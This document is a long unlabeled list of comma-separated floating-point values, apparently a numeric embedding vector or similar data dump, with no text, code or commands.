-0.03338438645005226, -0.022269828245043755, -0.04016983136534691, -0.03001880645751953, -0.014330858364701271, 0.05401213839650154, 0.03159302845597267, -0.0362885557115078, 0.0002712057321332395, 0.0007455507293343544, 0.0002054717333521694, -0.03875846043229103, 0.00006610507261939347, 0.013726954348385334, 0.025296136736869812, -0.014941548928618431, -0.006914367899298668, -0.020125627517700195, -0.018849965184926987, -0.0026480196975171566, -0.030208798125386238, -0.020899169147014618, -0.0008409710135310888, -0.05007658153772354, -0.032488707453012466, -0.01988135278224945, 0.0025258816312998533, 0.021604854613542557, 0.01897210255265236, 0.034198641777038574, 0.022690527141094208, -0.04274829849600792, -0.0014520850963890553, 0.03490432724356651, -0.040495533496141434, -0.004108586814254522, 0.0045801750384271145, 0.00689401151612401, 0.02674822136759758, 0.0008511492051184177, 0.012302011251449585, 0.03042593225836754, 0.01612221635878086, 0.003267191583290696, -0.013781237415969372, -0.01914852485060692, -0.03430720791220665, 0.0035487874411046505, -0.01600007712841034, -0.029611678794026375, 0.0022748203482478857, 0.010103526525199413, 0.025771118700504303, 0.042802583426237106, -0.02568969316780567, -0.005835482385009527, 0.006792230065912008, -0.03457862511277199, -0.027766039595007896, -0.028634576126933098, 0.0020441152155399323, -0.012553072534501553, 0.01002888660877943, 0.01000853069126606, -0.03303154185414314, -0.009099281392991543, 0.00038464987301267684, 0.01337411068379879, 0.018822822719812393, -0.02509257383644581, 0.03973556309938431, 0.0436982624232769, -0.029258836060762405, 0.007477559614926577, 0.030995910987257957, -0.012010236270725727, 0.02027490735054016, 0.01208487618714571, 0.019718501716852188, -0.005842267535626888, 0.002505525480955839, -0.009601403959095478, -0.03493146970868111, -0.017072178423404694, 0.054907817393541336, -0.016352921724319458, -0.016760047525167465, 0.021876273676753044, -0.02267695590853691, -0.010483511723577976, -0.029313120990991592, -0.007043291348963976, -0.021794848144054413, -0.004356255289167166, 0.012437719851732254, -0.03753707930445671, -0.02342335507273674, 0.007640410680323839, 0.021577714011073112, 0.008603943511843681, 0.02678893506526947, 0.01042244303971529, -0.01708574965596199, 0.017710009589791298, -0.015226537361741066, 0.023084081709384918, -0.0179271437227726, -0.05808340385556221, -0.03710281103849411, -0.013387681916356087, -0.0005385946715250611, 0.012600569985806942, -0.012240941636264324, -0.03156588599085808, -0.046385299414396286, -0.02639537863433361, 0.007796475663781166, 0.029665963724255562, 0.021034877747297287, -0.021686280146241188, 0.00006970983667997643, 0.04776952788233757, 0.023979760706424713, -0.0318915881216526, -0.014792269095778465, -0.025377562269568443, -0.013577674515545368, -0.0031552317086607218, 0.02255481667816639, 0.026775363832712173, 0.020994165912270546, -0.015620092861354351, 0.008875361643731594, -0.001343518029898405, -0.00784397404640913, -0.09027355164289474, -0.03873131796717644, -0.04877377301454544, 0.04681956768035889, 0.03254299238324165, 0.018388554453849792, -0.012335938401520252, -0.0018456409452483058, 0.018646402284502983, -0.016108645126223564, -0.05694345012307167, 0.00800003856420517, 0.04318256676197052, 0.012831275351345539, -0.038487039506435394, -0.017316455021500587, -0.0299373809248209, 0.005075512453913689, -0.0037625289987772703, 0.0060051181353628635, 0.01932494528591633, -0.05317074432969093, -0.01031387597322464, 0.005218006670475006, 0.007653981447219849, 0.030751634389162064, -0.007172214798629284, 0.018592117354273796, -0.0319187305867672, -0.012017021887004375, -0.0025937361642718315, 0.005614955443888903, -0.011684535071253777, -0.015728659927845, 0.000440629810327664, -0.05341501906514168, -0.0349586084485054, 0.0432639941573143, 0.021252011880278587, 0.005028014536947012, 0.02574397623538971, 0.02871600165963173, 0.0024444563314318657, 0.05895194038748741, -0.009031426161527634, -0.00025530235143378377, 0.01116205658763647, -0.013102693483233452, -0.015755802392959595, -0.01992206461727619, -0.01966421864926815, -0.018890677019953728, 0.022866947576403618, 0.006805800832808018, 0.002393565606325865, -0.03859560936689377, 0.003068717196583748, -0.016352921724319458, 0.008156104013323784, 0.015850799158215523, -0.03115876019001007, 0.0349586084485054, -0.00009430707723367959, 0.0001671975915087387, -0.01031387597322464, -0.06313177198171616, 0.004230724647641182, -0.014588705264031887, -0.01302126795053482, -0.011501328088343143, -0.013557317666709423, 0.0020034024491906166, 0.02963882125914097, 0.0067481244914233685, -0.005750664044171572, 0.017207887023687363, -0.009601403959095478, 0.0476338192820549, 0.006944902241230011, 0.0018286772537976503, 0.037347085773944855, -0.0012697263155132532, -0.004586960654705763, -0.02604253590106964, -0.019039956852793694, -0.008217173628509045, 0.024671876803040504, 0.017031464725732803, 0.010327446274459362, 0.008549660444259644, -0.01700432412326336, -0.00609672162681818, -0.018592117354273796, 0.007504701614379883, 0.011331692337989807, 0.03807991370558739, -0.013503034599125385, 0.025866113603115082, -0.0013698115944862366, 0.04605959728360176, -0.01378802303224802, 0.018768539652228355, 0.028905993327498436, 0.005594599060714245, -0.00979139655828476, -0.010232450440526009, -0.027114635333418846, 0.009635331109166145, 0.007918613962829113, -0.017886431887745857, 0.014249433763325214, -0.0017014502082020044, 0.0268703605979681, 0.010062813758850098, 0.007715050131082535, 0.03357437998056412, 0.040794093161821365, -0.03707566857337952, -0.017465734854340553, -0.023328358307480812, -0.009173921309411526, 0.031403038650751114, -0.06237180531024933, -0.037347085773944855, 0.004186619073152542, -0.010999205522239208, -0.02058703824877739, -0.016149356961250305, -0.02879742719233036, 0.012003451585769653, 0.01357088889926672, 0.0033045115415006876, 0.0037286016158759594, -0.017805006355047226, 0.0038812742568552494, -0.013659100048244, -0.03908415883779526, 0.005017836112529039, -0.021564142778515816, -0.014452996663749218, 0.009065354242920876, -0.00393216498196125, 0.0027786395512521267, -0.030697351321578026, -0.004597138613462448, 0.0052010430954396725, -0.0345243401825428, -0.004770167637616396, 0.025499699637293816, -0.0024512417148798704, -0.006737946532666683, 0.01891781948506832, 0.03181016445159912, -0.018388554453849792, -0.023830480873584747, 0.015022974461317062, 0.036342840641736984, -0.00678544444963336, 0.0006967803346924484, -0.005058548878878355, -0.02281266450881958, 0.02460402250289917, -0.00891607441008091, 0.006276536267250776, -0.014982261694967747, 0.018687114119529724, 0.04994087293744087, -0.021265583112835884, -0.0318915881216526, -0.01175917498767376, 0.011053488589823246, 0.021659139543771744, 0.0065208119340240955, 0.011114558205008507, 0.0366956852376461, -0.005614955443888903, -0.02757604606449604, 0.005720129702240229, 0.016312208026647568, 0.03224443271756172, -0.002751497784629464, -0.017099320888519287, -0.005123010370880365, -0.02779318019747734, -0.02171342261135578, -0.006435994058847427, -0.021916985511779785, -0.014792269095778465, -0.003243442391976714, 0.047009557485580444, 0.024061186239123344, -0.004013590514659882, -0.020614180713891983, -0.028118882328271866, -0.028173165395855904, -0.004400360863655806, 0.002739623188972473, 0.0074979159981012344, -0.008529303595423698, 0.0013706597965210676, -0.0055369227193295956, 0.021577714011073112, -0.0039593069814145565, -0.005859231110662222, -0.02346406690776348, -0.024834726005792618, -0.020695606246590614, 0.01804928295314312, 0.015335104428231716, 0.008230743929743767, 0.029421687126159668, 0.059060510247945786, -0.04950660094618797, -0.01450728066265583, -0.028037456795573235, 0.0011314728762954473, -0.005808340385556221, 0.003080591792240739, 0.015267250128090382, 0.009424982592463493, -0.0008880450623109937, 0.0040882304310798645, -0.004916054662317038, 0.032977260649204254, 0.03145731985569, -0.01249878853559494, 0.027114635333418846, 0.013950874097645283, -0.007558985147625208, -0.007823617197573185, -0.0039355577901005745, -0.01140633225440979, -0.006832942366600037, -0.0037489579990506172, 0.008339310996234417, 0.004973731003701687, -0.0026581978891044855, 0.014303716830909252, 0.0012112018885090947, 0.0013630262110382318, -0.03881274163722992, -0.00015256648475769907, 0.005781198851764202, -0.00800003856420517, 0.021781276911497116, -0.005601384211331606, 0.0174793042242527, 0.019677788019180298, 0.026544658467173576, 0.04291114956140518, 0.00011832118616439402, 0.007124716881662607, -0.029693104326725006, -0.024766871705651283, -0.03826990723609924, -0.011501328088343143, -0.017031464725732803, 0.0015818567480891943, -0.0022816057316958904, 0.022622670978307724, 0.012234156019985676, 0.007056862115859985, 0.026626083999872208, 0.024224037304520607, -0.011229910887777805, 0.01739787869155407, -0.012844846583902836, 0.027033209800720215, -0.028878850862383842, -0.024536166340112686, 0.0009550513350404799, 0.013360540382564068, -0.025065431371331215, -0.014452996663749218, -0.02311122417449951, -0.016936469823122025, -0.034632910043001175, -0.042151179164648056, 0.005896551068872213, 0.0024105291813611984, 0.016108645126223564, 0.013313041999936104, -0.01800856925547123, 0.011067059822380543, -0.0033604914788156748, -0.007301138248294592, -0.0066192010417580605, -0.007185785565525293, -0.045516762882471085, 0.051542237401008606, -0.03129446879029274, 0.015620092861354351, -0.027236774563789368, -0.02403404377400875, -0.01582365669310093, 0.023287644609808922, -0.025621838867664337, -0.0275353342294693, 0.025146856904029846, -0.020682035014033318, -0.025377562269568443, -0.002296872902661562, -0.010103526525199413, -0.00852251797914505, 0.012139160186052322, -0.010456370189785957, 0.002117058727890253, -0.012770206667482853, -0.017275741323828697, 0.03186444565653801, 0.03580000624060631, -0.047389544546604156, 0.02735891193151474, -0.006700626574456692, 0.001663282047957182, -0.01389659009873867, -0.01400515716522932, 0.03683139383792877, 0.012356294319033623, 0.020831314846873283, 0.002147593069821596, -0.009323201142251492, 0.006174754351377487, -0.008190031163394451, 0.012885559350252151, 0.020464900881052017, -0.03216300532221794, -0.0155115257948637, -0.0048142727464437485, -0.00891607441008091, -0.01918923668563366, -0.0016369884833693504, -0.010218879207968712, -0.012139160186052322, 0.03172873705625534, 0.0068261572159826756, -0.003630212740972638, 0.020532755181193352, -0.00021151502733118832, -0.0025716833770275116, -0.027372483164072037, -0.030181657522916794, 0.027087494730949402, -0.03840561583638191, -0.030208798125386238, -0.05634633079171181, 0.005991547368466854, 0.03295011818408966, 0.026028964668512344, -0.037564221769571304, 0.019949207082390785, 0.01647505909204483, -0.004905876237899065, -0.03360152244567871, 0.022011982277035713, 0.03273298591375351, -0.0071586440317332745, -0.007463988848030567, -0.012709137052297592, 0.002685339655727148, -0.017764294520020485, -0.00440375367179513, -0.013313041999936104, 0.026381807401776314, 0.012213800102472305, -0.0008846523123793304, -0.001620872993953526, -0.007708264980465174, 0.01621721312403679, -0.03311296924948692, 0.008698939345777035, -0.005296039395034313, 0.0011950863990932703, 0.04912661761045456, -0.023830480873584747, -0.0014885568525642157, 0.005781198851764202, -0.015036544762551785, -0.007131502032279968, 0.0065140267834067345, 0.03911130130290985, -0.03167445585131645, 0.05235648900270462, 0.033058684319257736, -0.0056420969776809216, -0.029747389256954193, -0.010904209688305855, -0.02346406690776348, -0.027236774563789368, 0.02801031433045864, -0.006581881083548069, 0.017886431887745857, -0.03837847337126732, 0.0038235979154706, 0.0023274074774235487, 0.011745604686439037, 0.012335938401520252, -0.008868576027452946, 0.012437719851732254, -0.022188402712345123, -0.03143017739057541, -0.007185785565525293, 0.018646402284502983, -0.032407283782958984, 0.010870281606912613, 0.029774529859423637, 0.00808824971318245, 0.04117407649755478, -0.014710843563079834, -0.005808340385556221, -0.00861072912812233, 0.01844283752143383, -0.005038192495703697, -0.039437003433704376, -0.0033995076082646847, -0.00017080236284527928, 0.0021730386652052402, -0.07404276728630066, 0.014493709430098534, -0.019867781549692154, -0.004047517664730549, -0.03959985449910164, -0.04825808107852936, -0.016773618757724762, -0.00350128929130733, -0.0305887833237648, 0.03400864824652672, -0.033058684319257736, 0.018931390717625618, 0.01708574965596199, -0.04785095527768135, -0.000997460330836475, -0.011379190720617771, -0.01891781948506832, -0.018171420320868492, -0.011413117870688438, -0.02963882125914097, 0.015280821360647678, -0.001213746378198266, -0.014900836162269115, 0.002039026003330946, -0.006768480874598026, -0.0022290186025202274, -0.02507900260388851, 0.014276575297117233, 0.00020101878908462822, 0.0021849130280315876, -0.004949981812387705, 0.005655667744576931, 0.01735716685652733, -0.008183246478438377, -0.04947946220636368, 0.03224443271756172, 0.010646362788975239, -0.017465734854340553, -0.02604253590106964, 0.008637870661914349, -0.029557395726442337, -0.0013384289341047406, 0.003263798775151372, 0.015633663162589073, 0.0305887833237648, 0.0076811229810118675, -0.0036064637824892998, 0.02915026992559433, -0.025241853669285774, 0.0012425845488905907, -0.04223260655999184, -0.02871600165963173, -0.025852544233202934, -0.026327524334192276, 0.017248600721359253, 0.0006946598878130317, -0.010897424072027206, -0.04782381281256676, 0.0053842500783503056, -0.006975437048822641, -0.010483511723577976, -0.0010110312141478062, -0.025621838867664337, -0.009221418760716915, -0.005011050961911678, -0.0012417363468557596, 0.02212054841220379, 0.01472441479563713, 0.006137434393167496, 0.031620170921087265, -0.0161764994263649, -0.00797289703041315, 0.0029126519802957773, -0.022405536845326424, 0.021740563213825226, 0.011433473788201809, -0.04117407649755478, 0.013849091716110706, -0.0155115257948637, 0.022039122879505157, -0.023369070142507553, 0.013828735798597336, 0.012688781134784222, 0.004271437413990498, 0.00895678624510765, 0.014832981862127781, 0.028960276395082474, 0.004261258989572525, -0.0032604059670120478, -0.016366492956876755, 0.01643434725701809, -0.013883019797503948, 0.030697351321578026, -0.010096740908920765, 0.02111630327999592, -0.03601713851094246, 0.015280821360647678, -0.01120955403894186, 0.024807585403323174, -0.0030025590676814318, -0.019962778314948082, -0.03346581384539604, -0.017547158524394035, -0.02027490735054016, 0.01376766711473465, -0.01883639395236969, -0.0170450359582901, -0.02080417238175869, -0.0006989007815718651, 0.019162094220519066, -0.016597196459770203, -0.0051196180284023285, 0.010259591974318027, 0.024576880037784576, -0.032190147787332535, -0.007966111414134502, -0.009126422926783562, 0.015362245962023735, -0.039437003433704376, 0.017112890258431435, 0.014561563730239868, 0.006588666699826717, -0.026422521099448204, 0.01608150266110897, -0.01700432412326336, -0.028987418860197067, 0.014575134962797165, 0.02530970796942711, -0.012451290152966976, 0.001406283350661397, -0.01518582459539175, 0.0028176559135317802, 0.03178302198648453, 0.0027650685515254736, -0.011888098903000355, -0.0362614169716835, 0.002877028426155448, -0.0458967462182045, -0.0008787150727584958, 0.02111630327999592, -0.010083170607686043, -0.005207828711718321, 0.015891510993242264, 0.016366492956876755, 0.004223939031362534, -0.033845797181129456, 0.00678544444963336, -0.024943294003605843, 0.01992206461727619, 0.04489250108599663, -0.032705843448638916, 0.004091623239219189, 0.048746634274721146, -0.0013121353695169091, -0.0018337663495913148, 0.025377562269568443, 0.03257013484835625, -0.01647505909204483, 0.0168279018253088, 0.007328280247747898, -0.010429227724671364, -0.008644656278192997, -0.007613268680870533, -0.028336016461253166, 0.02416975237429142, 0.01633935049176216, -0.00253436341881752, 0.018456408753991127, -0.02355906367301941, 0.01403229869902134, -0.0159593652933836, 0.0018541227327659726, -0.0308059174567461, 0.0033011187333613634, -0.008563230745494366, -0.028417441993951797, 0.015796514227986336, 0.02858029119670391, -0.002685339655727148, -0.006975437048822641, -0.0037319944240152836, 0.005944049451500177, 0.005597991868853569, 0.0014732896815985441, -0.00019911039271391928, 0.014317288063466549, -0.014317288063466549, 0.0006191718275658786, 0.01000853069126606, 0.057540569454431534, 0.007721835747361183, 0.025553984567523003, -0.03392722085118294, 0.008603943511843681, -0.012186658568680286, 0.01120955403894186, 0.026327524334192276, -0.0017226546769961715, -0.003969484940171242, -0.01970493048429489, -0.01773715205490589, -0.014452996663749218, -0.03153874725103378, -0.017900003120303154, 0.011433473788201809, -0.02613753266632557, 0.018415696918964386, 0.00523497024551034, 0.0012748154113069177, -0.010259591974318027, -0.00006817251414759085, 0.046168163418769836, -0.025445416569709778, 0.0011068755993619561, -0.014927977696061134, -0.008230743929743767, -0.004044124856591225, 0.01312983501702547, -0.0006933875847607851, 0.014561563730239868, 0.02224268764257431, -0.009614975191652775, -0.0046039242297410965, -0.0013799897860735655, -0.004614102188497782, -0.02111630327999592, -0.004037339240312576, -0.016027219593524933, -0.009506408125162125, -0.029557395726442337, -0.00959461834281683, 0.009011070244014263, -0.02307051047682762, 0.004902483429759741, 0.06671448796987534, 0.01053101010620594, -0.010809212923049927, 0.0038202053401619196, 0.0010483511723577976, -0.005041585303843021, 0.00150467234198004, -0.0006369836046360433, 0.022961944341659546, -0.012471647001802921, 0.0016293548978865147, 0.013061980716884136, 0.017547158524394035, 0.030344506725668907, -0.005000872537493706, 0.027019640430808067, -0.012620926834642887, 0.014846552163362503, 0.026273241266608238, 0.016352921724319458, 0.01686861552298069, 0.004349469672888517, 0.009323201142251492, -0.0011289282701909542, 0.033330101519823074, -0.0017421628581359982, -0.013061980716884136, 0.0005805795663036406, -0.013720168732106686, -0.006975437048822641, 0.004312150180339813, -0.002118755131959915, 0.0034283457789570093, 0.017316455021500587, 0.0011891491012647748, 0.025404704734683037, 0.019718501716852188, -0.002240892965346575, -0.0030941625591367483, -0.011053488589823246, -0.020682035014033318, 0.0152943916618824, 0.007206141948699951, -0.006327426992356777, 0.006062794476747513, -0.0078100464306771755, -0.0018235881580039859, 0.005319788586348295, -0.010218879207968712, 0.003704852657392621, -0.01203737873584032, -0.0030263082589954138, -0.017994998022913933, -0.0026056107599288225, -0.004902483429759741, -0.015755802392959595, -0.027073923498392105, 0.002622574334964156, -0.006120470818132162, 0.010001745074987411, 0.001179819111712277, -0.0052010430954396725, -0.008135748095810413, 0.015022974461317062, -0.020478472113609314, 0.007850759662687778, -0.03954556956887245, 0.0005118769477121532, -0.01655648462474346, 0.04044124856591225, 0.0031297863461077213, 0.015457242727279663, 0.009513192810118198, -0.010693860240280628, -0.0039898413233459, -0.006659913808107376, 0.002810870297253132, 0.011195983737707138, 0.0036098563577979803, -0.011521684937179089, -0.02342335507273674, 0.02084488607943058, -0.01582365669310093, 0.007708264980465174, 0.0010890638222917914, 0.021957697346806526, -0.02963882125914097, -0.027168920263648033, 0.005106046795845032, -0.024536166340112686, -0.001459718681871891, -0.01085671130567789, 0.02963882125914097, -0.00021564991038758308, -0.019894924014806747, 0.022351253777742386, -0.00012171390699222684, 0.022907661274075508, -0.011168841272592545, -0.005024621728807688, -0.012342723086476326, -0.006456350442022085, 0.02578468807041645, -0.014249433763325214, -0.008597157895565033, 0.026951786130666733, 0.016814330592751503, 0.01891781948506832, 0.005041585303843021, 0.01730288378894329, -0.0152943916618824, -0.008108606562018394, 0.003986448515206575, -0.04747096821665764, 0.0072943526320159435, 0.015579380095005035, -0.016841473057866096, 0.00004829328099731356, -0.0026581978891044855, -0.00904499739408493, 0.004834629129618406, 0.0013189207529649138, 0.015918653458356857, -0.03433435037732124, 0.02202555350959301, -0.0030755028128623962, -0.016760047525167465, -0.021699851378798485, 0.013306256383657455, -0.013849091716110706, 0.017750723287463188, 0.0064665284007787704, 0.03726566210389137, 0.005981369409710169, 0.009194277226924896, -0.01206452026963234, 0.00575744966045022, 0.01521296612918377, -0.001534358598291874, -0.004536069463938475, -0.015443671494722366, 0.016841473057866096, 0.01129776518791914, -0.00043087571975775063, 0.026938214898109436, 0.002800692105665803, -0.0049669453874230385, -0.012648068368434906, 0.013414823450148106, 0.010612434707581997, -0.0006327427108772099, -0.00118236371781677, 0.012098447419703007, -0.009648902341723442, 0.039138443768024445, -0.022174833342432976, 0.004736240021884441, 0.0033978112041950226, -0.01992206461727619, 0.014683702029287815, -0.01708574965596199, -0.0032926369458436966, -0.0003642935480456799, -0.0436982624232769, -0.013034839183092117, -0.009669258259236813, 0.006093329284340143, -0.008597157895565033, -0.012919486500322819, 0.0066429502330720425, 0.03159302845597267, 0.006602237466722727, -0.02149628847837448, 0.010836354456841946, 0.021916985511779785, 0.026151102036237717, 0.0297202467918396, -0.03300440311431885, 0.02316550724208355, -0.03390008211135864, 0.011168841272592545, 0.012919486500322819, 0.0013146798592060804, -0.014765127561986446, -0.02385762333869934, -0.010768500156700611, 0.0012739672092720866, -0.012566642835736275, -0.019555650651454926, -0.007633625064045191, -0.013279114849865437, 0.03403579071164131, -0.0017353774746879935, -0.007477559614926577, 0.01293984241783619, -0.006317248567938805, 0.011908454820513725, -0.046738140285015106, 0.0031688024755567312, -0.008983928710222244, -0.0072943526320159435, -0.011202768422663212, 0.01657005585730076, -0.017140032723546028, -0.012403792701661587, -0.029177410528063774, -0.0007290111971087754, -0.015104399062693119, 0.0017777864122763276, 0.01024602074176073, 0.006429208442568779, -0.005207828711718321, 0.0029703283216804266, -0.00601868936792016, 0.02509257383644581, 0.009601403959095478, -0.010822784155607224, -0.022744810208678246, 0.0015530185773968697, -0.00945890974253416, 0.03343867138028145, 0.016597196459770203, -0.010714217089116573, 0.004274830222129822, -0.011521684937179089, -0.0010288429912179708, 0.022758381441235542, -0.011419903486967087, 0.004800701979547739, 0.005170508753508329, -0.01046994049102068, -0.0049431961961090565, 0.025838973000645638, 0.005781198851764202, 0.017235029488801956, -0.015837227925658226, -0.016325779259204865, -0.012050949037075043, 0.024794014170765877, -0.007816831581294537, 0.006307070609182119, 0.015565809793770313, 0.0018134100828319788, 0.015063686296343803, -0.007871115580201149, -0.0002368544228374958, 0.020288478583097458, 0.014154436998069286, -0.002308747498318553, -0.004006804898381233, 0.002383387414738536, 0.010096740908920765, 0.016380062326788902, 0.003379151225090027, -0.004654814954847097, -0.007009364198893309, -0.000003647839093900984, -0.016936469823122025, 0.017506446689367294, -0.0062629650346934795, 0.0295031126588583, -0.0148601233959198, -0.0062324306927621365, 0.013760881498456001, -0.019867781549692154, 0.03159302845597267, -0.047090984880924225, 0.010931351222097874, -0.0062561798840761185, 0.027779608964920044, -0.019202807918190956, 0.007124716881662607, -0.018687114119529724, -0.003414775012061, -0.00365396193228662, -0.0013061980716884136, -0.0019304589368402958, 0.007375778164714575, 0.006089936476200819, -0.002247678581625223, 0.0001440846681362018, 0.024319032207131386, 0.0019406371284276247, -0.04527248442173004, -0.017886431887745857, -0.008386809378862381, -0.03767278790473938, 0.010754929855465889, -0.0022595529444515705, -0.02792888879776001, -0.008434307761490345, -0.004159477539360523, -0.02277195081114769, -0.011202768422663212, 0.013849091716110706, -0.00012807526218239218, -0.01343518029898405, 0.00719935679808259, 0.0053062173537909985, 0.005031406879425049, -0.008563230745494366, 0.05053798854351044, 0.0019033171702176332, -0.0017192619852721691, -0.014493709430098534, 0.018673542886972427, -0.027548903599381447, -0.012403792701661587, 0.015715088695287704, 0.030045948922634125, -0.022568387910723686, 0.0008206146885640919, -0.0030873771756887436, -0.022663384675979614, 0.00976425502449274, -0.012980555184185505, -0.022364825010299683, 0.017587872222065926, -0.02625967003405094, 0.006581881083548069, 0.012254512868821621, -0.005954227410256863, -0.0051264031790196896, -0.022622670978307724, -0.0185785461217165, -0.01966421864926815, -0.022405536845326424, -0.01984063908457756, -0.020695606246590614, -0.019772784784436226, 0.0018388554453849792, 0.015565809793770313, 0.02277195081114769, -0.003765921574085951, -0.01258699968457222, 0.0018710863078013062, 0.012525930069386959, 0.00987282209098339, 0.006408852059394121, -0.007151858415454626, -0.03905702009797096, 0.03750993683934212, 0.004878734704107046, 0.00006711228343192488, 0.012179872952401638, -0.0060288673266768456, 0.015742231160402298, -0.02049204148352146, -0.0009618367766961455, -0.009954246692359447, -0.016162928193807602, -0.006693840958178043, -0.010951707139611244, -0.00408483762294054, 0.01057850755751133, 0.033330101519823074, 0.005465675611048937, 0.007477559614926577, 0.001631899387575686, -0.001986438874155283, 0.010171380825340748, -0.03029022365808487, -0.007776119280606508, -0.00036620194441638887, -0.00924177560955286, -0.02273123897612095, 0.00506872683763504, 0.0323529988527298, 0.02980167232453823, -0.0301545150578022, 0.012966983951628208, -0.029313120990991592, -0.0016157840145751834, 0.0015114577254280448, 0.01590508222579956, -0.015484384261071682, 0.03357437998056412, -0.03908415883779526, 0.009357128292322159, 0.02285337634384632, -0.006710804533213377, 0.012519145384430885, -0.025187570601701736, -0.029883097857236862, -0.019501367583870888, -0.0008829559665173292, -0.024359745904803276, -0.009547119960188866, -0.012648068368434906, -0.002028847811743617, -0.006819371599704027, 0.0271010659635067, 0.011962738819420338, 0.04690099135041237, 0.005075512453913689, -0.009357128292322159, -0.009058568626642227, -0.032760124653577805, -0.012654853984713554, -0.012050949037075043, 0.02779318019747734, -0.01226129848510027, 0.017058607190847397, 0.026028964668512344, 0.029557395726442337, -0.006727768108248711, -0.006381710525602102, -0.03042593225836754, 0.01887710578739643, -0.01066671870648861, -0.005479246377944946, -0.0183614119887352, -0.030751634389162064, -0.010463155806064606, 0.018551405519247055, -0.018062852323055267, 0.03921986743807793, 0.0168279018253088, 0.03593571484088898, -0.002651412505656481, 0.014195149764418602, 0.010130668990314007, -0.0064393868669867516, 0.0017319846665486693, -0.016135787591338158, 0.0014953423524275422, 0.0031535353045910597, 0.001223924569785595, 0.005078905262053013, 0.0036573545075953007, -0.015172253362834454, 0.012743065133690834, 0.010001745074987411, -0.02657180093228817, 0.019813498482108116, -0.01918923668563366, 0.00700257858261466, -0.002417314564809203, -0.0036743180826306343, 0.007457203231751919, 0.0028939920011907816, -0.0015538667794317007, -0.004461429547518492, -0.01804928295314312, 0.001879568095318973, -0.009017855860292912, -0.006089936476200819, -0.02316550724208355, -0.00959461834281683, -0.033058684319257736, 0.004135728348046541, -0.011087416671216488, 0.032325856387615204, 0.02814602293074131, 0.006229037884622812, -0.0019626899156719446, -0.00959461834281683, 0.010015316307544708, -0.013082336634397507, 0.0036573545075953007, 0.018727825954556465, 0.008556445129215717, -0.014927977696061134, 0.010564937256276608, 0.01914852485060692, -0.024088328704237938, -0.015145111829042435, 0.00003572960486053489, 0.004386789631098509, 0.005024621728807688, -0.010619220323860645, -0.002307051094248891, 0.01948779635131359, -0.015457242727279663, 0.0034419167786836624, 0.0006543712806887925, 0.0006666699191555381, -0.014995831996202469, -0.0033740622457116842, -0.0018168027745559812, 0.023477638140320778, 0.019894924014806747, 0.012641282752156258, -0.01578294299542904, -0.012987340800464153, 0.01142668817192316, -0.0030229154508560896, -0.010110312141478062, -0.001373204286210239, -0.01057850755751133, -0.01918923668563366, -0.0018744789995253086, -0.013394467532634735, 0.03254299238324165, 0.011365619488060474, 0.004831236321479082, 0.022134119644761086, 0.021401291713118553, 0.008074678480625153, 0.004366433713585138, -0.0027888177428394556, 0.003942343406379223, -0.00968282949179411, -0.004210368264466524, -0.0044512515887618065, 0.003460576757788658, -0.015470813028514385, -0.004678564146161079, 0.021252011880278587, -0.014086582697927952, 0.007382563780993223, -0.0034809329081326723, -0.00587958749383688, -0.00527907581999898, -0.009316415525972843, 0.0023053546901792288, -0.0058694095350801945, 0.006856691557914019, -0.013414823450148106, -0.02062775194644928, 0.007450418081134558, 0.007273996248841286, 0.001299412571825087, -0.02814602293074131, -0.014425855129957199, -0.0074232760816812515, -0.0016785493353381753, -0.03145731985569, -0.013910161331295967, 0.007063647732138634, 0.0027311414014548063, -0.02206626534461975, -0.005631919018924236, -0.0018931389786303043, 0.010714217089116573, -0.006625986658036709, 0.02171342261135578, 0.003640390932559967, 0.015267250128090382, -0.0051264031790196896, 0.003779492573812604, -0.02784746326506138, -0.0010458066826686263, 0.007151858415454626, -0.00036683809594251215, 0.004973731003701687, 0.012254512868821621, -0.035989996045827866, -0.011033132672309875, 0.024156183004379272, -0.015701519325375557, 0.005014443304389715, 0.004437680821865797, 0.0034843257162719965, -0.019297804683446884, -0.023450495675206184, -0.02155057154595852, 0.0008396987686865032, -0.0036132491659373045, -0.0021526822820305824, 0.018782110884785652, 0.0406312420964241, 0.024047615006566048, 0.002491954481229186, -0.004797309171408415, 0.0075454143807291985, -0.00009070230589713901, -0.01228165440261364, -0.014765127561986446, -0.007355421781539917, -0.0020118842367082834, 0.000702717574313283, -0.006751517299562693, -0.005452104844152927, -0.0014987350441515446, 0.006944902241230011, 0.0033011187333613634, -0.014317288063466549, 0.002771854167804122, -0.007742192130535841, 0.004132335539907217, 0.018564976751804352, -0.007715050131082535, -0.018239274621009827, -0.007077218499034643, -0.0011051793117076159, 0.011480972170829773, 0.008190031163394451, -0.016977181658148766, -0.02015276998281479, 0.006178147159516811, 0.0161764994263649, -0.026693938300013542, 0.029313120990991592, -0.008468234911561012, -0.00907213892787695, -0.021686280146241188, 0.0010992420138791203, -0.0015716785565018654, 0.029285978525877, -0.0011026347056031227, 0.004821058362722397, 0.010381730273365974, 0.006690448150038719, -0.004329113755375147, -0.018985673785209656, 0.0002529698540456593, 0.0038032415322959423, -0.0014164615422487259, 0.007748977746814489, 0.012492002919316292, -0.01521296612918377, -0.011447045020759106, -0.004349469672888517, -0.0039593069814145565, -0.00766076659783721, 0.003928772173821926, 0.006106900051236153, -0.012003451585769653, -0.020437758415937424, 0.014670130796730518, 0.01590508222579956, -0.011487757787108421, -0.010632791556417942, -0.00371503084897995, -0.0027854249347001314, 0.0029618465341627598, -0.018456408753991127, 0.011799887754023075, 0.011725247837603092, 0.005051763262599707, -0.009669258259236813, 0.005849053151905537, -0.012342723086476326, -0.014344429597258568, 0.007484345231205225, -0.014358000829815865, -0.0065683103166520596, -0.011202768422663212, 0.008773579262197018, -0.020953452214598656, -0.007022934965789318, -0.009275702759623528, -0.016352921724319458, -0.015009403228759766, 0.004240902606397867, 0.013937302865087986, 0.014018728397786617, -0.006836335174739361, 0.032760124653577805, -0.007857544347643852, 0.009581047110259533, -0.008902503177523613, -0.01411372423171997, -0.00732149463146925, -0.017994998022913933, -0.008230743929743767, 0.0025394526310265064, -0.006222252734005451, 0.0034945039078593254, 0.0078100464306771755, 0.023694772273302078, -0.023572634905576706, 0.009988173842430115, 0.005591206252574921, 0.0023664238397032022, -0.016841473057866096, 0.0023138364776968956, 0.010544580407440662, 0.018469979986548424, 0.0011687928345054388, -0.0011450437596067786, -0.030344506725668907, -0.002363031031563878, -0.002296872902661562, 0.0010771893430501223, 0.03588142991065979, 0.007735406514257193, 0.011548826470971107, 0.021604854613542557, -0.017547158524394035, 0.031755879521369934, 0.008841434493660927, -0.0018456409452483058, 0.00005916059308219701, 0.029883097857236862, 0.013394467532634735, 0.0005530136986635625, -0.007484345231205225, -0.004759989213198423, 